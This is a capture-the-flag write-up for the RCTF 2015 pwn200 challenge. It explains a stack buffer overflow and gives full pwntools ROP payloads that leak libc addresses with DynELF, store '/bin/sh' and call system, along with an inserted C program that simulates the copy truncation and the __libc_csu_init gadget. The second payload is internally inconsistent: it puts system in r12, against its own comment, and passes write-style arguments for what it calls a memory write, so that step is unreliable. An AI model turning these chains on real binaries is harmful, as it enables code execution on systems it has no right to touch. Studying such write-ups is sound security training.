pwn200
The vulnerability is obvious: main reads input into a local array, then hands it to a child function (echo) which copies it byte by byte into a smaller local array on its own stack.
The general idea is to leak the address of system, write /bin/sh to a fixed address, and finally call system.
The leak uses the DynELF implementation in pwntools, with the whole ROP chain acting as the leak function.
// IDA pseudo-code
int __fastcall echo(__int64 a1)
{
  char s2[16]; // [sp+10h] [bp-10h]@2
  __int64 i;   // loop index (declaration not shown in the listing)

  for ( i = 0; *(_BYTE *)(i + a1); ++i )
    s2[i] = *(_BYTE *)(i + a1);
  s2[i] = 0;
  if ( !strcmp("ROIS", s2) )
  {
    printf("RCTF{welcome}", s2);
    puts("is not flag");
  }
  return printf("%s", s2);
}
This is where the data is copied, but the loop condition is byte != '\x00', so copying stops at the first '\x00'.
That is painful, because a 64-bit ROP chain unavoidably contains 0x00 bytes: every address in the 0x400000 range has zero high bytes, and so do small constants such as 0 and 1.
First of all, this is an x64 binary with NX enabled, which means ROP, and the universal gadget in __libc_csu_init lets us control all the arguments.
Ignoring the truncation for a moment, the exploit looks like this:
exp  = 'A' * 24
exp += p64(0x40089a)   # pop6ret in __libc_csu_init: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
exp += p64(0)          # rbx = 0, so the gadget does call [r12 + 0*8]
exp += p64(1)          # rbp = 1, so after add rbx,1 the cmp rbx,rbp is equal and the loop ends
exp += p64(write_got)  # r12: where the call reads its target from. It must be a GOT entry; the PLT holds instructions, not a pointer. The arguments (1, addr, 8) make this a write(1, addr, 8)
exp += p64(8)          # r13 -> rdx, 3rd argument
exp += p64(leak_addr)  # r14 -> rsi, 2nd argument
exp += p64(1)          # r15 -> edi, 1st argument
exp += p64(0x400880)   # jump to the call gadget
exp += 'A' * 56        # the add rsp,8 and six pops after the call lift the stack by 56 bytes
exp += p64(0x4007cd)   # return to the start of main and do it again
The above is the normal way to do ROP with the universal springboard in __libc_csu_init. Now check it against the copy loop: it obviously breaks at the exp += p64(0) line (strictly, the first NUL is already in the high bytes of 0x40089a; that one is harmless, because the stale return address in that slot has zero high bytes too, but nothing after it is copied). However, the full payload also sits on main's stack, since main's read does not stop at NUL, so one can put a pop4ret at the return address instead: it lifts rsp by 32 bytes and lands in main's copy of the buffer, where the chain is intact.
That way the '\x00' limit no longer matters. But I think there should be a better design, because what if the distance were not 32 bytes but 96 bytes? There is no pop12ret, is there?
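To make the chain layout and the truncation concrete, here is an added example in C (my own model, not code from the write-up). It builds the chain above with the page's addresses, runs echo's NUL-terminated copy against a simulated echo frame to show exactly where the payload is cut and why the return slot still reads 0x40089a, and then walks the two csu gadgets over the intact chain (as it sits in main's buffer) to show which call is made, why rbx = 0 and rbp = 1 stop the loop, and why 56 bytes of padding land on the next return address. The GOT slot 0x601018, the leak address 0x601000, the save address 0x601100, the saved rbp and echo's original return address are constructed placeholders; the register-to-argument mapping (r13 to rdx, r14 to rsi, r15 to edi) is the one the write-up's comments give, matching the __libc_csu_init of glibc versions of that time.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Addresses from the write-up. The binary is not PIE, so every .text address has zero high bytes. */
#define CSU_POP6_RET 0x40089aULL  /* __libc_csu_init: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret */
#define CSU_CALL     0x400880ULL  /* mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]; add rbx,1; cmp rbx,rbp; jne */
#define MAIN_START   0x4007cdULL  /* the chain returns here so main runs again */

#define OVERFLOW_PAD 24           /* s2 (16 bytes at rbp-0x10) plus the saved rbp */
#define CSU_PAD      56           /* add rsp,8 plus six pops between the call and the next ret */
#define CHAIN_LEN    (OVERFLOW_PAD + 8 * 8 + CSU_PAD + 8)   /* 152 bytes */

/* Constructed placeholders, not values from the challenge: only their zero high bytes matter. */
#define STALE_RET    0x4008f0ULL  /* echo's real return address into main */
#define STALE_RBP    0x7ffd0000ULL

static void p64(uint8_t *dst, uint64_t v) { for (int i = 0; i < 8; i++) dst[i] = (uint8_t)(v >> (8 * i)); }
static uint64_t u64(const uint8_t *src) { uint64_t v = 0; for (int i = 7; i >= 0; i--) v = (v << 8) | src[i]; return v; }

/* Lay out the write-up's chain. call_slot is an address that HOLDS the function pointer (a GOT
 * entry): the gadget does call [r12+rbx*8], so r12 must not be the function itself. */
size_t build_csu_chain(uint8_t *out, uint64_t call_slot, uint64_t arg1, uint64_t arg2, uint64_t arg3)
{
    size_t n = 0;
    memset(out + n, 'A', OVERFLOW_PAD); n += OVERFLOW_PAD;
    p64(out + n, CSU_POP6_RET);         n += 8;
    p64(out + n, 0);                    n += 8;  /* rbx = 0: call [r12 + 0*8]               */
    p64(out + n, 1);                    n += 8;  /* rbp = 1: rbx+1 == rbp, so no second call */
    p64(out + n, call_slot);            n += 8;  /* r12                                      */
    p64(out + n, arg3);                 n += 8;  /* r13 -> rdx                               */
    p64(out + n, arg2);                 n += 8;  /* r14 -> rsi                               */
    p64(out + n, arg1);                 n += 8;  /* r15 -> edi                               */
    p64(out + n, CSU_CALL);             n += 8;
    memset(out + n, 'A', CSU_PAD);      n += CSU_PAD;
    p64(out + n, MAIN_START);           n += 8;
    return n;
}

/* echo()'s copy loop exactly as decompiled: stop at the first NUL, then NUL-terminate. */
size_t echo_copy(uint8_t *s2, const uint8_t *src)
{
    size_t i;
    for (i = 0; src[i]; i++) s2[i] = src[i];
    s2[i] = 0;
    return i;
}

/* Run the copy against a simulated echo frame (s2, saved rbp, return address, then a slice of
 * main's frame). Returns the value echo will ret to; *copied receives how many bytes arrived. */
uint64_t hijacked_ret(const uint8_t *chain, size_t *copied)
{
    uint8_t frame[OVERFLOW_PAD + 8 + 64];
    memset(frame, 0xcc, sizeof frame);      /* stands in for whatever main's frame holds */
    p64(frame + 16, STALE_RBP);
    p64(frame + 24, STALE_RET);
    *copied = echo_copy(frame, chain);
    return u64(frame + 24);
}

struct csu_call { uint64_t slot, edi, rsi, rdx, next_ret; int loops; };

/* Walk the two csu gadgets over an intact copy of the chain, as it sits in main's buffer.
 * loops == 1 means rbx+1 != rbp, i.e. the gadget would jump back and call again. */
struct csu_call simulate_csu(const uint8_t *chain)
{
    struct csu_call c = {0};
    size_t rsp = OVERFLOW_PAD;                      /* rsp at the overwritten return address */
    if (u64(chain + rsp) != CSU_POP6_RET) { c.loops = -1; return c; }
    rsp += 8;
    uint64_t rbx = u64(chain + rsp),      rbp = u64(chain + rsp + 8),  r12 = u64(chain + rsp + 16);
    uint64_t r13 = u64(chain + rsp + 24), r14 = u64(chain + rsp + 32), r15 = u64(chain + rsp + 40);
    rsp += 48;
    if (u64(chain + rsp) != CSU_CALL) { c.loops = -1; return c; }
    rsp += 8;
    c.rdx  = r13;                    /* mov rdx, r13 */
    c.rsi  = r14;                    /* mov rsi, r14 */
    c.edi  = (uint32_t)r15;          /* mov edi, r15d: only the low 32 bits survive */
    c.slot = r12 + rbx * 8;          /* call [r12 + rbx*8] */
    rbx += 1;                        /* add rbx, 1 */
    c.loops = (rbx != rbp);          /* cmp rbx, rbp; jne -> back to the call */
    rsp += 8 + 6 * 8;                /* add rsp, 8; pop rbx, rbp, r12, r13, r14, r15 */
    c.next_ret = u64(chain + rsp);   /* ret */
    return c;
}

int main(void)
{
    uint8_t chain[CHAIN_LEN];
    size_t copied;
    /* 0x601018 stands in for write@got, 0x601000 for the address DynELF asks to leak. */
    build_csu_chain(chain, 0x601018ULL, 1, 0x601000ULL, 8);
    uint64_t ret = hijacked_ret(chain, &copied);
    printf("echo copied %zu of %d bytes; its return slot now reads 0x%llx\n",
           copied, CHAIN_LEN, (unsigned long long)ret);
    struct csu_call c = simulate_csu(chain);
    printf("call [0x%llx](edi=%llu, rsi=0x%llx, rdx=%llu), loops=%d, then ret to 0x%llx\n",
           (unsigned long long)c.slot, (unsigned long long)c.edi, (unsigned long long)c.rsi,
           (unsigned long long)c.rdx, c.loops, (unsigned long long)c.next_ret);
    return 0;
}
```

Two things the model makes visible: the copy stops after 27 bytes, inside the gadget address itself, so the hijack only works because the stale high bytes of the return slot were already zero (non-PIE binary), and nothing from rbx onward ever reaches echo's frame, which is why the chain has to be executed from main's copy. Also, mov edi, r15d keeps only the low 32 bits of the first argument; that is fine for a .bss address like save address + 8 in a 0x600000-range binary, but it would silently truncate a libc or stack pointer passed as the first argument.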
The next task is to build the ROP chain that writes /bin/sh to memory and then runs system, assuming we have already leaked the address of system.
exp  = 'A' * 24
exp += p64(0x40089a)   # pop6ret in __libc_csu_init
exp += p64(0)          # rbx = 0, so the gadget does call [r12 + 0*8]
exp += p64(1)          # rbp = 1, so the cmp rbx,rbp after the call is equal and the loop ends
exp += p64(system)     # r12: where the call reads its target from. It must be a GOT-style pointer slot; the PLT holds instructions, not a pointer
exp += p64(8)          # r13 -> rdx, 3rd argument
exp += p64(save_addr)  # r14 -> rsi, 2nd argument
exp += p64(1)          # r15 -> edi, 1st argument
exp += p64(0x400880)   # jump to the call gadget
exp += 'A' * 56        # lift the stack by 56 bytes past the add rsp,8 and six pops
exp += p64(0x4007cd)   # same routine as before: back to the start of main
Note that the leaked system address is only usable once it has been written to a known address: the call gadget takes its target from memory (call [r12+rbx*8]), so r12 has to point at a slot that holds the function pointer, exactly like a GOT entry.
Finally, one more round:
exp  = 'A' * 24
exp += p64(0x40089a)       # pop6ret in __libc_csu_init
exp += p64(0)              # rbx = 0, so the gadget does call [r12 + 0*8]
exp += p64(1)              # rbp = 1, so the cmp rbx,rbp after the call is equal and the loop ends
exp += p64(save_addr)      # r12: the save address now holds the system pointer, so this is call [save_addr]
exp += p64(0)              # r13 -> rdx, 3rd argument
exp += p64(0)              # r14 -> rsi, 2nd argument
exp += p64(save_addr + 8)  # r15 -> edi, 1st argument: the /bin/sh string stored right after the pointer
exp += p64(0x400880)       # jump to the call gadget
exp += 'A' * 56            # lift the stack by 56 bytes past the add rsp,8 and six pops
exp += p64(0x4007cd)       # same routine as before
Analysis of the RCTF 2015 pwn challenges